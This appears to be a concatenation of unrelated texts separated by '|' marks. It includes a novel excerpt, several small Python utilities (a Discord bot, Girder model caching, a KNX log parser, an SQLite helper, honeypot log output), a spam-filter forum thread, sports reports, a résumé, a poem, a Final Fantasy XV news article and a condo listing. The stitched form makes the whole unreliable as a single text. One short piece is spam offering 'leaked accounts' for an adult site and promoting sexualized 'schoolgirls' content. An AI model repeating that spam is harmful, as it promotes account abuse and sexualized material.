I did not like this iteration of one idea—this strange recurrence of one image, and I grew nervous as bedtime approached and the hour of the vision drew near.
In the first weeks the days were long; they often, at their finest, gave me what I used to call my own hour, the hour when, for my pupils, teatime and bedtime having come and gone, I had, before my final retirement, a small interval alone.
A bedtime visit to the east gable produced no result.
|
import cabbagerc
import discord
from discord.ext import commands
from phrasebook.Phrasebook import Phrasebook
from datetime import datetime
cabbageNumber = 2
cabbageStealer = 0
cabbageTheftTime = 0
description = '''Bot That Performs Cabbage-Related Functions'''
bot = commands.Bot(command_prefix=cabbagerc.PREF, description=description)
modules = [
'mod.roller.roller',
'mod.trump.trump',
'mod.admin.admin',
'mod.poll.poll',
'mod.starboard.starboard',
'mod.scp.scp'
]
def autoset():
''' Setup functions '''
global modules
for mod in modules:
bot.load_extension(mod)
def timeStrSince(d):
diff = datetime.now() - d
ts = int(diff.total_seconds())
con = ''
if ts == 0:
return 'just now'
con += str(ts % 60) + ' seconds'
minute = int(ts/60)
if minute == 0:
return con
con = str(minute % 60) + ' minutes and ' + con
hour = int(minute/60)
if hour == 0:
return con
con = str(hour % 24) + ' hours, ' + con
day = hour / 24
if day == 0:
return con
con = str(day) + ' days, ' + con
return con
@bot.event
async def on_ready():
print('CABBAGE IS ONLINE')
print('USER: ' + bot.user.name + ' [' + bot.user.id + ']')
print('=================')
@bot.command(pass_context=True)
async def intro(ctx):
''' Test Command '''
p = Phrasebook(ctx, bot)
await bot.say(p.pickPhrase('core', 'intro1'))
await bot.say(p.pickPhrase('core', 'intro2'))
@bot.command(pass_context=True)
async def cabbages(ctx):
''' Displays the current number of cabbages '''
p = Phrasebook(ctx, bot)
global cabbageNumber
global cabbageStealer
global cabbageTheftTime
print('User ' + str(ctx.message.author) + ' requested cabbage count (currently ' + str(cabbageNumber) + ')')
if datetime.now().hour < 5:
await bot.say(p.pickPhrase('cabbage', 'checkLate'))
return
if cabbageNumber == 0:
await bot.say(p.pickPhrase('cabbage', 'checkOut', cabbageStealer, timeStrSince(cabbageTheftTime)))
else:
await bot.say(p.pickPhrase('cabbage', 'check', cabbageNumber))
@bot.command(pass_context=True)
async def takeCabbage(ctx):
''' Take a cabbage for yourself
Be careful, though: once the cabbages are gone, they're gone until I restart. '''
p = Phrasebook(ctx, bot)
global cabbageNumber
global cabbageStealer
global cabbageTheftTime
print('User ' + str(ctx.message.author) + ' took cabbage (now ' + str(cabbageNumber-1) + ')')
if cabbageNumber > 1:
cabbageNumber = cabbageNumber - 1
if cabbageNumber > 100:
await bot.say(p.pickPhrase('cabbage', 'takePlenty', cabbageNumber))
else:
await bot.say(p.pickPhrase('cabbage', 'take', cabbageNumber))
elif cabbageNumber == 1:
cabbageNumber = 0
await bot.say(p.pickPhrase('cabbage', 'takeLast'))
cabbageStealer = ctx.message.author
cabbageTheftTime = datetime.now()
else:
await bot.say(p.pickPhrase('cabbage', 'checkOut', cabbageStealer.name, timeStrSince(cabbageTheftTime)))
autoset()
bot.run(cabbagerc.TKN)
|
Poco Forums • View topic - Spam filtering app that works well with Pocomail?
Spam filtering app that works well with Pocomail?
tribble wrote: I'd like to try a simple experiment. Could I send you guys my spam and good corpus, replace your own and see if the results improve (or vice versa as I receive, on average, 300 spam messages a day).
I reset my results for each beta and final release and within a day or two am right back to >98%.
I have >56K junk words and >18K good words in my corpi, with 98.83% accuracy today.
Hey, tribble. If you're still interested in trying this little experiment, I'd be willing to give it a shot.
How would we do that? I would hate to replace my spam/good corpi (corpuses?) with yours and not be able to swap back. Afraid you'd have to walk me through what to do if we tried it?
For the record: By creating two non-Bayesian filters, I now have 99 percent accuracy. But any email that isn't caught by those two filters simply isn't caught by the Bayesian filter. It lands in my inbox and I use the spam icon to label it as spam and move it to my junk mailbox. Yet it seems to have no impact later on actually training the Bayesian filter. When I turn off the Bayesian filter altogether, the two non-Bayesian filters do about the same amount of filtering.
In other words, I honestly think the Bayesian filter is having almost NO impact on my Junk mail, even with spam/good corpi of 39,000+ spam and 34,000+ good.
As an alternative to trying someone elses files on your computer then maybe you could send one of us your DBSpam.ini, DBGood.ini, poco.ini, filters.ini and events.ini files to try on our systems for a day? That would give us the chance to make sure your filters are set up correctly as well as checking your corpus. I don't think theres anything personal in those files (account info is in accounts.ini) but it's up to you.
The process to replace our respective files should be easy.
2) Copy, move or rename your DBGood.ini and DBSpam.ini files.
Restart Poco (or Barca). Adjust your filters so the BF is the first in the list (drap and drop).
I'll also give you what my BF related settings are for comparison).
I don't think I can post the whole corpi in this forum so I'll need an email address (send me a PM).
I too use Mailwasher all the time as it downloads just the headers and therefore gives better virus protection. Also, it is so easy to put a tick in a box to blacklist e-mail or set friends.
I am using G-Lock SpamCombat and happy with it. It works independently of any email client and deletes spam directly from the server. You can use the whitelist, blacklist as well as train the Bayesian filter. Now I don't even see spam in my Inbox.
|
#############################################################################
# Copyright Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#############################################################################
import cherrypy
import time
from girder.api.rest import getCurrentToken
from girder.utility.model_importer import ModelImporter
LoadModelCache = {}
LoadModelCacheMaxEntries = 100
LoadModelCacheExpiryDuration = 300 # seconds
def invalidateLoadModelCache(*args, **kwargs):
"""
Empty the LoadModelCache.
"""
LoadModelCache.clear()
def loadModel(resource, model, plugin='_core', id=None, allowCookie=False,
level=None):
"""
Load a model based on id using the current cherrypy token parameter for
authentication, caching the results. This must be called in a cherrypy
context.
:param resource: the resource class instance calling the function. Used
for access to the current user and model importer.
:param model: the model name, e.g., 'item'.
:param plugin: the plugin name when loading a plugin model.
:param id: a string id of the model to load.
:param allowCookie: true if the cookie authentication method is allowed.
:param level: access level desired.
:returns: the loaded model.
"""
key = tokenStr = None
if 'token' in cherrypy.request.params: # Token as a parameter
tokenStr = cherrypy.request.params.get('token')
elif 'Girder-Token' in cherrypy.request.headers:
tokenStr = cherrypy.request.headers['Girder-Token']
elif 'girderToken' in cherrypy.request.cookie and allowCookie:
tokenStr = cherrypy.request.cookie['girderToken'].value
key = (model, tokenStr, id)
cacheEntry = LoadModelCache.get(key)
if cacheEntry and cacheEntry['expiry'] > time.time():
entry = cacheEntry['result']
cacheEntry['hits'] += 1
else:
# we have to get the token separately from the user if we are using
# cookies.
if allowCookie:
getCurrentToken(allowCookie)
cherrypy.request.girderAllowCookie = True
entry = ModelImporter.model(model, plugin).load(
id=id, level=level, user=resource.getCurrentUser())
# If the cache becomes too large, just dump it -- this is simpler
# than dropping the oldest values and avoids having to add locking.
if len(LoadModelCache) > LoadModelCacheMaxEntries:
LoadModelCache.clear()
LoadModelCache[key] = {
'id': id,
'model': model,
'tokenId': tokenStr,
'expiry': time.time() + LoadModelCacheExpiryDuration,
'result': entry,
'hits': 0
}
return entry
|
Below we’ve posted leaked accounts to get into r18.com members area for free!
Are these free R18 logins inactive? Use this promo link to get your Discount on R18 JAV Schoolgirls now. You’ll get a much better price, and full access to R18’s amazing members area. Treat yourself, this R18 JAV Schoolgirls deal is only for a limited time!
|
from time import time, mktime, strptime
import hashlib
import sys
from knxmonitor.Knx.KnxParseException import KnxParseException
from knxmonitor.Knx.KnxParser import KnxParser
class KnxLogViewer(object):
def _readLinesFromFileOrCache(self, infile):
try:
inf = infile
except IOError:
print "%s: Unable to read file: %s" %(sys.argv[0], infile.name)
sys.exit(1);
except:
op.print_help()
sys.exit(1);
print "Reading file: %s" % infile.name
l = inf.readlines()
inf.close()
# Ok, so now we have the file content. However, parsing it
# is expensive, so look for an already parsed cache of the file.
# The cache files first line is the MD5 sum of the infile, which
# we use to see if the cache is up to date. If it is not, re-parse
# the whole in file and update cache. Future enhancement could be
# to use the part of the cache file that is already there.
hsh = hashlib.md5()
for ll in l:
hsh.update(ll)
infile_md5 = hsh.hexdigest()
cachename = infile.name.replace(".hex",".cache")
try:
inf = open(cachename, "r")
clines = inf.readlines()
cache_md5 = clines.pop(0).strip()
if cache_md5 == infile_md5:
# Ok, seems good...
print "Using cached input for file %s" %infile.name
return (None, infile_md5, clines)
else:
print "Cached file found, but hash mismatch"
print "FILE: %s" %infile_md5
print "CACHE: %s" %cache_md5
except IOError:
# No luck in getting cached input, just use the new...
print "No cached input for file %s found..." %infile.name
return (cachename, infile_md5, l)
def __init__(self, devicesfilename, groupaddrfilename, infiles,
dumpGAtable, types, flanksOnly, tail, groupAddressSet = None,
hourly_avg = False, start_time=None):
self.delta = 0
self.delta2 = 0
self.pduCount = 0
self.pduSkipped = 0
self.h_avg = hourly_avg if hourly_avg != None else False
self.dbgMsg = "groupAddressSet = %s" %str(groupAddressSet)
start = time()
#
# Read in all the files...
#
lines = []
lines_meta = []
start = 1
for infile in infiles:
cachename, hash, newLines = self._readLinesFromFileOrCache(infile)
lines.extend(newLines)
lines_meta.append( (infile.name, cachename, hash,
start, len(newLines) ) )
start += len(newLines)
print "Creating parser..."
self.knx = KnxParser(devicesfilename, groupaddrfilename,
dumpGAtable, flanksOnly, types)
if tail != 0:
if tail < len(lines):
lines = lines[len(lines) - tail :]
if start_time != None:
self.found_start = "Trying to locate start time..."
print "Trying to locate start time..."
for i in range(len(lines)-1, 0, -1):
try:
timestamp, pdu = lines[i].split(":LPDU:")
except ValueError:
timestamp, pdu = lines[i].split("LPDU:")
ts = mktime(strptime(timestamp, "%a %b %d %H:%M:%S %Y"))
if ts < start_time:
print "Found start time!"
self.found_start = "Found start time!"
lines = lines[i+1:]
break
else:
self.found_start = "not relevant"
#
# Parsing the input...
#
basetime = 0
lineNo = 0
origfilename, cachefilename, hash, startLine, numLines = lines_meta.pop(0)
for line in lines:
# Skip empty lines...
if len(line.strip()) < 1:
continue
# If filter specified, skip unwanted GAs
if groupAddressSet != None:
ignore = True
for ga in groupAddressSet:
if line.find(ga) != -1:
ignore = False
break
if ignore:
self.pduSkipped += 1
continue
lineNo += 1
# Differentiate between parsing new files and loading cached input
if line[:2] == "@@":
pass
#print "loading: %s" %line.strip().decode("utf-8")
else:
# Split timestamp from rest...
try:
timestamp, pdu = line.split(":LPDU:")
except ValueError:
timestamp, pdu = line.split("LPDU:")
try:
if basetime == 0:
basetime = mktime(strptime(timestamp,
"%a %b %d %H:%M:%S %Y"))
self.knx.setTimeBase(basetime)
except ValueError:
printVerbose("timestamp error: %s" %timestamp)
try:
self.knx.parseVbusOutput(lineNo, timestamp, pdu)
self.pduCount += 1
except KnxParseException:
print "Failed: %s: %s" %(lineNo, pdu)
sys.exit(1)
# Check if we are into a new file, in which case we should
# potentially update the cache file for the last file...
# Note that the --tail option disables creation of cache files
if (tail == 0) and lineNo == startLine + numLines - 1:
if cachefilename != None:
print "update cache file for %s (%s) at %s" %(origfilename,
cachefilename,
lineNo)
try:
of = open(cachefilename, "w")
except IOError:
print cachefilename
else:
# write hash at first line
of.write("%s\n" % hash)
self.knx.storeCachedInput(of, startLine)
# Shift meta data to new file...
try:
origfilename, cachefilename, hash, startLine, numLines = lines_meta.pop(0)
except:
print "Last file done, line no (%s)" %lineNo
origfilename, cachefilename, hash, startLine, numLines = (None, None, None, None, None)
if lineNo % 10000 == 0:
print "Parsed %d lines..." %lineNo
print "Parsed %d lines..." %lineNo
self.dbgMsg += "Parsed %d lines..." %lineNo
self.delta = time() - start
def getPerfData(self):
s = "<p>"
s += "found_start: %s<p>"%self.found_start
if self.delta != 0:
s += "KnxLogViewer: Time used for init: %f (%d PDUs parsed, %d skipped)<p>" %(self.delta, self.pduCount, self.pduSkipped)
s += "Debug: %s<p>GlobalDebug:%s<p>" %(self.dbgMsg, globDbgMsg)
self.delta = 0
s += "KnxLogViewer: Time used for plotgen: %f<p>" %self.delta2
s += "<p>"
return s
def getMinMaxValues(self, groupAddr):
return self.knx.getStreamMinMaxValues(groupAddr)
def plotLog(self, groupAddrs, plotImage, addHorLine=None):
start = time()
self.knx.plotStreams(groupAddrs, plotImage, addHorLine)
self.delta2 = time() - start
def printLog(self, groupAddrs):
self.knx.printStreams(groupAddrs)
def printJSON(self, groupAddrs):
self.knx.printStreams(groupAddrs, "JSON")
|
Since December of 2016 I have been full-time employed as a Java Developer, developing on types of projects such as ERP system, mobile app store, application generator. While still employed as a Java Developer, after freelancing in parallel for a couple of months in Golang and Java, I got a permanent remote position as a Go Developer starting December of 2017. Since I enjoy Golang development more than Java, I would like to make a complete transition to Golang.
I am looking for a position where I can code in Golang.
At the moment I would like to work remotely, but at some point I will be looking into relocating to a different country.
|
#!/usr/bin/env python
import sqlite3
import sys
from utils import Utils
class MyDB():
def __init__(self, sqlite_file):
self.sqlite_file = sqlite_file + "spf.sqlite"
#print self.sqlite_file
self.conn = None
if (not self.checkDB()):
self.initDB()
def getCursor(self):
if (self.conn == None):
#print self.sqlite_file
try:
self.conn = sqlite3.connect(self.sqlite_file)
except sqlite3.OperationalError as e:
print e
except:
print sys.exc_info()[0]
return self.conn.cursor()
def checkDB(self):
try:
cursor = self.getCursor()
except:
print sys.exc_info()[0]
cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='users'")
if cursor.fetchone() is None:
return False
cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='hosts'")
if cursor.fetchone() is None:
return False
cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='web_templates'")
if cursor.fetchone() is None:
return False
cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='ports'")
if cursor.fetchone() is None:
return False
return True
def initDB(self):
cursor = self.getCursor()
cursor.execute("DROP TABLE IF EXISTS users")
cursor.execute("CREATE TABLE users(user TEXT)")
cursor.execute("DROP TABLE IF EXISTS hosts")
cursor.execute("CREATE TABLE hosts(name TEXT, ip TEXT)")
cursor.execute("DROP TABLE IF EXISTS web_templates")
cursor.execute("CREATE TABLE web_templates(ttype TEXT, src_url TEXT, tdir TEXT)")
cursor.execute("DROP TABLE IF EXISTS ports")
cursor.execute("CREATE TABLE ports(port INTEGER, host TEXT)")
self.conn.commit()
return
def addUser(self, user):
cursor = self.getCursor()
cursor.execute('INSERT INTO users VALUES(?)', (user,))
self.conn.commit()
return
def addUsers(self, users):
for user in users:
self.addUser(user)
return
def addHost(self, name, ip=""):
cursor = self.getCursor()
cursor.execute('INSERT INTO hosts VALUES(?,?)', (name, ip,))
self.conn.commit()
return
def addHosts(self, hosts):
for host in hosts:
self.addHost(host)
return
def addPort(self, port, host):
cursor = self.getCursor()
cursor.execute('INSERT INTO ports VALUES(?,?)', (port, host,))
self.conn.commit()
return
def addWebTemplate(self, ttype, src_url, tdir):
cursor = self.getCursor()
cursor.execute('INSERT INTO web_templates VALUES(?,?,?)', (ttype, src_url, tdir,))
self.conn.commit()
return
def getUsers(self):
users = []
cursor = self.getCursor()
cursor.execute('SELECT user FROM users')
for row in cursor.fetchall():
users.append(row[0])
return Utils.unique_list(users)
def getWebTemplates(self, ttype="static"):
templates = []
cursor = self.getCursor()
cursor.execute('SELECT src_url, tdir FROM web_templates WHERE ttype=?', (ttype,))
for row in cursor.fetchall():
templates.append(str(row[1])+"[-]"+str(row[0]))
return Utils.unique_list(templates)
|
For the third consecutive season, Warren East ran into a Hopkinsville team hungry for another postseason run.
Hosting the Tigers in the opening round of the Class 4A playoffs for the third time in as many years, the Raiders were dominated on both sides of the ball and dealt a 24-0 loss on Friday night at Jim Ross Field, having their season ended with a 6-5 overall record.
Warren East – which was also eliminated by Hoptown in a 21-7, first-round loss on Nov. 3, 2017 in Bowling Green – was limited offensively and its defense couldn’t keep up with an explosive Tigers’ offense.
Hopkinsville (5-6) led 3-0 after the opening quarter, 10-0 at halftime and went onto add 24 more points to its side of the scoreboard in the second half, never allowing the Raiders to string together any momentum.
Hopkinsville quarterback Ellis Dunn led the way with two total touchdowns – one passing and one rushing – while running back Jordan Hopson also recorded a rushing score to lead the Tigers to their fourth straight win.
With Hopkinsville’s victory, it advances to the second round and will travel to Madisonville-North Hopkins next Friday for a 7:30 p.m. kickoff.
Hopkinsville was the aggressor in the opening half.
While holding Warren East scoreless, the Tigers scored twice in the first and second quarters to lead 10-0 at the break.
Mason Marschand kicked a 34-yard field goal at the 7:10 mark of the first to record the first score of the night, and Dunn later connected with Tayshaun Barker for a 51-yard touchdown with 4:12 left in the second.
Along with its offensive production in the first half, Hopkinsville’s defense was also stout. While forcing Warren East to punt three times, turn it over on downs once and commit a turnover, Raiders’ standout running back Thomas Maxey was held to just 44 yards in the first 24 minutes, while quarterback Nolan Ford had completed just three-of-10 passes for 25 yards with 39 rushing yards.
Maxey – in his final high school game – finished with 71 yards on 21 carries. Ford, a sophomore, went 3-for-12 for 23 yards, while recording 27 yards on 12 carries.
“He’s a character, first and foremost, but he’s a tremendous athlete and a tremendous competitor,” Griffith said of Maxey. “You don’t coach a Thomas Maxey very often in your coaching career. We’ll certainly have big shoes to fill with him.
Hopkinsville continued to execute in the ensuing half – especially in the third quarter.
Outscoring East 14-0 in the period, Hoptown pushed its advantage to 24-0 and dug the Raiders into an even deeper hole. Dunn’s 23-yard TD run at the 7:34 mark made it 17-0 before Hopson later ran for a 23-yard score of his own to put the Tigers up by three scores and a field goal entering the final frame.
Holding a comfortable lead, Hopkinsville was able to cruise throughout the final 12 minutes and into the second round.
|
"""
Copyright (c) 2014, Are Hansen - Honeypot Development.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted
provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions
and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions
and the following disclaimer in the documentation and/or other materials provided with the
distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND AN EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
__author__ = 'Are Hansen'
__date__ = '2014, Aug 3'
__version__ = '0.0.1'
def fwIRC(data_out):
"""Processes and outputs the results of the firewall.log's parsing for IRC dest. """
print '\n ========= IRC Destinations ========='
for irc, detail in data_out.items():
print ' IRC address: {0:>23}'.format(irc)
for info in detail:
print ' - {0}'.format(info)
print ''
|
Refused the food he offered through her cage.
Slaughtered that morning at too young an age.
Wiser ones warned her: don’t get caught in traps.
Himself in your warmth under moonless skies.
Sprawled and pressed against her cage he would lie.
Unwillingly warmed to his eyes gone wide.
With him she lies. Stray of her feral side.
His eyes are brown like fawns, like bear cub hide.
|
"""Importer of French Département data in MongoDB."""
import typing
from typing import Any, Dict, List
from bob_emploi.data_analysis.lib import cleaned_data
from bob_emploi.data_analysis.lib import mongo
def make_dicts(
french_departements_tsv: str, french_oversea_departements_tsv: str, prefix_tsv: str) \
-> List[Dict[str, Any]]:
"""Import départements info in MongoDB.
Args:
french_departements_tsv: path to a TSV file containing the main
information about départements from INSEE.
french_oversea_departements_tsv: path to a TSV file containing the
information about oversea collectivities.
prefix_tsv: path to a TSV file containing the prefix for each
département.
Returns:
A list of dict that maps the JSON representation of Departement protos.
"""
departements = cleaned_data.french_departements(
filename=french_departements_tsv,
oversea_filename=french_oversea_departements_tsv,
prefix_filename=prefix_tsv)
departements['_id'] = departements.index
return typing.cast(
List[Dict[str, Any]], departements[['_id', 'name', 'prefix']].to_dict('records'))
if __name__ == '__main__':
mongo.importer_main(make_dicts, 'departements')
|
The animated series will be free to watch on YouTube, and the movie will see release later this year.
Making a blockbuster video game in the modern era takes time, but even by those standards, you could say that developer Square Enix is running the risk of trying gamers’ patience with Final Fantasy XV. It’s been years since the game was first announced, and even though there’s been a steady trickle of previews since then, that doesn’t change the fact that fans have been kept waiting long enough to eat their way through the menus at both of Tokyo’s Final Fantasy themed restaurants.
12 months ago the company released a playable demo of the game, but for its Uncovered Final Fantasy XV fan and press event, held in Los Angeles, it was going to have to throw gamers an even bigger bone. The nicest news about the game itself is that it finally has an official release date: September 30 of this year. Given that the event was held in the U.S., one would assume that this is the date when gamers not just in Japan, but in North America as well will be able to finally play the finished product.
But that wasn’t the only surprise Square Enix had up its sleeve. At one point, the screen’s image of the game’s four male leads quietly switched from CG to anime art.
This probably had some people in the audience confused, as the drawings were too detailed and polished to be just concept art. So why would Square Enix go to the trouble of producing such polished hand-drawn designs?
Because there’s also going to be a Final Fantasy XV anime series, titled Brotherhood Final Fantasy XV.
▼ And here’s the entire first episode.
▼ That this cast has the potential to result in an avalanche of fujoshi fan art? Why yes, I am thinking that.
Part of the anime preview’s on-screen text reads “From childhood to adulthood,” but since that transition is also a major theme of the Final Fantasy XV game, it’s unclear how much of the anime’s and game’s storylines will.
▼ Will Noctis also hate lettuce in the playable Final Fantasy XV? We’ll find out in September!
At the very least, though, it seems to share the game’s penchant for camping and teleporting around to better hit dudes in the face with a sword.
The preview featured Japanese voices with English subtitles, which suggested that it won’t be exclusive to Japan. Of course, the even surer sign was Square Enix’s announcement that you’ll be able to watch all five episodes of Brotherhood Final Fantasy XV for free on YouTube.
And yet, even this isn’t the most ambitious side-project for Final Fantasy XV’s narrative. That honor goes to Kingsglaive Final Fantasy XV, a CG movie set in the game’s world.
In contrast to Brotherhood, none of the game’s four male leads are shown in the Kingsglaive trailer. Instead, the focus seems to be on the power struggle that sets the game’s events in motion, with game protagonist Noctis’ father King Regis and fiancée Luna playing prominent roles.
While the presentation refered to Kingsglaive as a “movie,” it also give a release date of 2016, which would give the producers a very small window of time to work with drumming up publicity for a full-fledged theatrical release. As such, it seems more likely that Kingsglaive will be handled in a style along the lines of 2005’s Final Fantasy VII: Advent Children, a direct-to-video release with film festival and limited theatrical screenings, as opposed to the general-release commercial and critical flop that was 2001’s Final Fantasy: The Spirits Within. the trailer’s flashy action sequences and character designs also seem more tailored to fans of anime and video games than the mainstream movie-going public at large.
As for the game itself, it’s on track to have the most detailed visuals and expansive environments of any Final Fantasy game to date, with a particular amount of care put into lovingly rendering the great outdoors. And while the tone for Kingsglaive may be dead-serious, the playable Final Fantasy XV won’t be completely devoid of lighter, cuter moments. As part of the presentation, Square Enix finally let us see the game’s versions of Chocobos, Final Fantasy’s flightless avian mounts.
They look as adorable as ever, and since the presentation also showed that they can now perform high-speed drifts, September 30 can’t come soon enough.
Follow Casey on Twitter to make sure you don’t miss the next Chocobo sighting.
Forget cups and cones – Krispy Kreme Japan is sandwiching its ice cream inside doughnuts!
|
# -*- coding: utf-8 -*-
# Copyright (C) 2017 Matthias Luescher
#
# Authors:
# Matthias Luescher
#
# This file is part of edi.
#
# edi is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# edi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with edi. If not, see <http://www.gnu.org/licenses/>.
import os
import pkg_resources
import re
import logging
from edi.lib.helpers import FatalError
# The do_release script will update this version!
# During debuild neither the git version nor the package version is available.
edi_fallback_version = '0.4.5'
def get_edi_version():
"""
Get the version of the current edi installation or the version derived from git.
:return: full edi version string
"""
project_root = os.path.abspath(os.path.join(os.path.dirname(__file__), "../.."))
git_dir = os.path.join(project_root, ".git")
if os.path.isdir(git_dir):
# do import locally so that we do not depend on setuptools_scm for the released version
from setuptools_scm import get_version
return get_version(root=project_root)
else:
try:
return pkg_resources.get_distribution('edi').version
except pkg_resources.DistributionNotFound:
logging.warning('Using fallback version {}.'.format(edi_fallback_version))
return edi_fallback_version
def get_stripped_version(version):
"""
Strips the suffixes from the version string.
:param version: Version string that needs to be parsed
:return: a stripped version string of the format MAJOR[.MINOR[.PATCH]]
"""
result = re.match('\d+(\.\d+){0,2}', version)
if result:
return result.group(0)
else:
raise FatalError('''Unable to parse version '{}'.'''.format(version))
|
Wow, this is the condo you have been looking for. It's rare to find a 1700+ sq. ft. 3 bedroom, 3 bath condo in Howell. Also included is a full basement and a 2 car garage. This just over 2 year old home was a builders model with many high end features. You will find quality everywhere you look with ceramic tile, Bradford 42 inch maple cabinets, and granite counter tops. Later the owner installed a beautiful dark stained laminate floor. This amazing floor plan is spacious with 2 bedrooms on the main floor with a huge master and loft upstairs. Did I mention this home also has walk-in closets? The other rooms flow perfectly together allowing for a nice sized kitchen, dining room, and great room. With this location being close to highway access, shopping and downtown; it will not last long. Call now for your your private showing.
|
"""
This is the main entry point for the ARC cli application
"""
import sys
import types
import logging
import importlib
import functools
import arc.config
import arc.connection
import arc.defaults
import arc.cli.args.parser
__all__ = ['App']
class App(object):
"""
Base class for CLI application
"""
def __init__(self, config_klass=None, argument_parser_klass=None):
"""
Initializes a new app instance.
This class is intended both to be used by the stock arcli application
and also to be reused by custom applications. If you want, say, to
limit the amount of command line actions and its arguments, you can
simply supply another argument parser class to this constructor. Of
course another way to customize it is to inherit from this and modify
its members at will.
:param config_klass: an optional configuration class. By default it
will use the arc.config.Config class.
:param argument_parser_klass: an optional argument parser class. By
default it will use arc.cli.args.parser.Parser
"""
#: The application holds a connection instance so that other actions
#: can simply use an already initialized connection for convenience
self.connection = None
self.log = None
self._initialize_log()
self.config = None
self.config_klass = config_klass
self._initialize_config()
self.argument_parser = None
self.argument_parser_klass = argument_parser_klass
self.parsed_arguments = None
self._initialize_argument_parser()
def _initialize_log(self):
"""
Initializes a log instance based on the class name
"""
logging.basicConfig()
self.log = logging.getLogger(self.__class__.__name__)
def _initialize_config(self):
"""
Initializes the configuration system
We keep track of the configuration class used in case it was overriden
"""
if self.config_klass is None:
self.log.debug("Initializing default config class")
self.config = arc.config.get_default()
else:
self.log.debug("Initializing user supplied config class: %s",
self.config_klass)
self.config = self.config_klass()
def _initialize_argument_parser(self):
"""
Initialize the argument parser, either the default or supplied one
"""
if self.argument_parser_klass is None:
self.log.debug("Initializing default argument parser class")
self.argument_parser = arc.cli.args.parser.Parser(self.config)
self.argument_parser.add_arguments_on_all_modules()
else:
self.log.debug("Initializing user supplied argument parser class:"
" %s", self.argument_parser_klass)
self.argument_parser = self.argument_parser_klass(self.config)
def parse_arguments(self):
"""
Parse the arguments from the command line
"""
self.parsed_arguments = self.argument_parser.parse_args()
if hasattr(self.parsed_arguments, "top_level_action"):
self.log.debug("Action (subparser): %s",
self.parsed_arguments.top_level_action)
def initialize_connection(self):
"""
Initialize the connection instance
"""
if self.connection is not None:
self.log.debug("Connection is already initialized")
else:
if hasattr(self.parsed_arguments, "host"):
h = self.parsed_arguments.host
self.log.debug("Connecting to: %s", h)
try:
self.connection = arc.connection.Connection(h)
except arc.connection.InvalidServiceVersionError:
self.log.error("The RPC interface version on the connected "
"server is more recent than this version of "
"arc can support. Please use a more recent "
"version of arc that should include support "
"for the latest Autotest version.")
raise SystemExit
else:
self.log.warn("Host setting not present on arguments, not "
"initializing a connection")
def dispatch_action(self):
"""
Calls the actions that was specified via command line arguments.
This involves loading the relevant module file.
"""
module_name = "%s.%s" % (arc.defaults.ACTIONS_MODULE_PREFIX,
self.parsed_arguments.top_level_action)
self.log.debug("Attempting to load action module: %s", module_name)
try:
module = importlib.import_module(module_name)
self.log.debug("Action module loaded: %s", module)
except ImportError:
self.log.critical("Could not load action module: %s", module_name)
return
# Filter out the attributes out of the loaded module that look
# like command line actions, based on type and 'is_action' attribute
module_actions = {}
for attribute_name in module.__dict__:
attribute = module.__dict__[attribute_name]
if (isinstance(attribute, types.FunctionType) or
isinstance(attribute, functools.partial)):
if hasattr(attribute, 'is_action'):
if attribute.is_action:
module_actions[attribute_name] = attribute
chosen_action = None
for action in module_actions.keys():
if getattr(self.parsed_arguments, action, False):
self.log.debug("Calling action %s from module %s",
action, module_name)
chosen_action = action
break
kallable = module_actions.get(chosen_action, None)
if kallable is not None:
self.initialize_connection()
return kallable(self)
else:
self.log.error("Action %s specified, but not implemented",
chosen_action)
def run(self):
"""
Main entry point for application
"""
self.parse_arguments()
action_result = self.dispatch_action()
if isinstance(action_result, int):
sys.exit(action_result)
elif isinstance(action_result, bool):
if action_result is True:
sys.exit(0)
else:
sys.exit(1)
|
Hendrick Is Getting Along Just Fine!
Record signing Jeff Hendrick insists he is getting along just fine at Burnley!
The Clarets midfielder has spent his first week being teased by new team mates regarding the fines system in place at the training ground for minor misdemeanours.
The Friday fines’ ritual is all a part of the incredible team spirit engendered by staff and players.
And despite several attempts to catch him out, the Republic of Ireland ace has been given a welcome helping hand by international team mate Stephen Ward to keep on the right side of the line!
“There’s been a few rules around with fines for doing certain things, such as leaving bottles lying around and silly little things like that, but luckily I’ve had a week’s grace and they have let a few things slide,” Hendrick laughed.
“I’ve been using that to test the water to find out what is a fineable offence and they’ve been waiting to catch me out.
“Wardy has been helping me to be fair, which is nice, but a few of the others have been making me worry!
